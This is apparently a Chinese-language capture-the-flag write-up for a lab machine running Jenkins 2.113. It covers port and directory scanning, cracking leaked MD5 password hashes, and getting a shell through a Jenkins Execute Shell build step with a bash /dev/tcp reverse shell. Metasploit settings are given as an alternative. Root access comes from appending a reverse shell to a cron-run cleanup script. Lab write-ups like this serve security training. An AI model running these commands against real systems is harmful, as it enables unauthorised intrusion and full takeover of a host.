Mssn Harvey

nmap扫描存活主机和端口，发现开放了22、80、3306、8080端口

访问80端口如下，但是没什么有用的信息

访问8080端口如下，可知是Jenkins的登录面板，其版本为2.113

接着扫目录不过并没有发现什么有用的信息，搜索一下相关漏洞都无法利用，后面看了下wp发现dirb带个-X啥的参数再来扫一下发现access.html

# dirb http://192.168.150.149 -w /usr/share/wordlists/dirb/big.txt -X .txt,.html
---- Scanning URL: http://192.168.150.149/ ----
+ http://192.168.150.149/access.html (CODE:200|SIZE:359)                                 
+ http://192.168.150.149/index.html (CODE:200|SIZE:32808)                                    
-----------------

访问得到三个hash加密的用户密码

tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98

cmd5解密得到账密如下：

tiago/italia99
trindade/marianna
eder/vipsu

尝试登录发现eder/vipsu可以成功登录Jenkins，然后ssh和mysql都无法登录

点击Manage Jenkins -> Configure System有个Shell executable的设置，可以执行一些 shell 命令

于是我们点击New Item，随便输入一个主题名字并选择Freestyle project

接着往下滑点击Add build step -> Execute Shell，输入反弹shell命令

/bin/bash -i >& /dev/tcp/192.168.150.128/1234 0>&1

build后nc成功反弹shell

也可以利用msf上线

use exploit/multi/http/jenkins_script_console
set target 1
set rhosts 192.168.150.149
set rport 8080
set username eder
set password vipsu
set targeturi /

python -c 'import pty; pty.spawn("/bin/bash")'

然后查看计划任务发现了个CleaningScript.sh的脚本，它会以 root 权限运行，从系统中删除访问日志，每5分钟会自动执行一次

cat /etc/crontab
cd /etc/script
cat CleaningScript.sh

于是我们对其写入反弹shell命令

echo "/bin/bash -i >& /dev/tcp/192.168.150.128/4321 0>&1" >> /etc/script/CleaningScript.sh

等待几分钟nc成功反弹shell